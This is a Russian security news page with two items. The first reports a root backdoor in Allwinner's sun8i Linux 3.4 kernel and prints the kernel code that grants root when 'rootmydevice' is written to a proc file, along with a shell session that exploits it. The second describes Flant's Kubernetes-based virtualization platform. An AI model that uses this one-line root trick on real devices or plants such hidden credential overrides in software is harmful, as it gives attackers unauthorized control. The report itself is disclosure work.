Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Разработчики Linux-дистрибутива Armbian обратили внимание на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".

   $ id
   uid=1000(user) gid=1000(user) 
   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
   $ id
   uid=0(root) gid=0(root) 

Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner H3, A83T и H8, включая Orange Pi, FriendlyARM, SinoVoip M2+ и M3 Banana Pi, Cubietruck и LinkSprite pcDuino8 Uno, пишет opennet.ru.

Для предоставления прав root в обработчике sunxi_proc_su_write используется следующий код, выставляющий привилегии root текущему процессу:

        if(!strncmp("rootmydevice",(char*)buf,12)){
		cred = (struct cred *)__task_cred(current);
		cred->uid = 0;
		cred->gid = 0;
		cred->suid = 0;
		cred->euid = 0;
		cred->euid = 0;
		cred->egid = 0;
		cred->fsuid = 0;
		cred->fsgid = 0;
		printk("now you are root\n");
	}

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива Armbian 5.10. 

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Флант выпустил первую версию платформы виртуализации на Kubernetes

Компания «Флант» выпустила первую стабильную версию Deckhouse Virtualization Platform (DVP) — российской платформы виртуализации на базе Kubernetes. Она позволяет запускать и управлять в одной среде как виртуальными машинами, так и контейнерами. Сейчас продукт проходит завершающую стадию сертификации в ФСТЭК России.

В DVP виртуальные машины управляются так же, как и контейнеры, через единый API Kubernetes.

Это упрощает администрирование и позволяет применять одни и те же политики безопасности, использовать единый мониторинг и сетевые настройки. Кроме того, есть веб-интерфейс для администраторов и пользователей.

Появление платформы совпало с окончанием срока поддержки VMware vSphere 7 — одной из самых распространённых в России систем виртуализации. Это повышает интерес к российским решениям. В современных инфраструктурах требуется не только классическая виртуализация, но и интеграция с контейнерными технологиями, и именно на это сделан акцент в DVP.

Платформа поддерживает до 1000 серверов и 50 000 виртуальных машин, может работать в закрытых контурах без интернета и совместима с отечественными ОС. Она подходит для миграции с устаревших систем, работы с гибридными нагрузками и постепенного перехода от монолитных приложений к микросервисам.

В DVP реализованы встроенный мониторинг на базе Grafana и переработанной версии Prometheus, сканирование образов на уязвимости, микросегментация сети через Cilium, поддержка мультитенантности и ролевая модель доступа. Есть интеграция с системами хранения данных и собственное программно-определяемое хранилище.

Одно из направлений развития связано с сотрудничеством с Postgres Pro. Совместно создано решение для управления жизненным циклом баз данных PostgreSQL — с автоматизацией развёртывания, обновлений, резервного копирования и масштабирования.

Deckhouse Virtualization Platform включена в Единый реестр российского ПО. Платформа регулярно обновляется, а её возможности уже используются в проектах партнёров — в том числе для миграции с VMware и запуска гибридных приложений.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru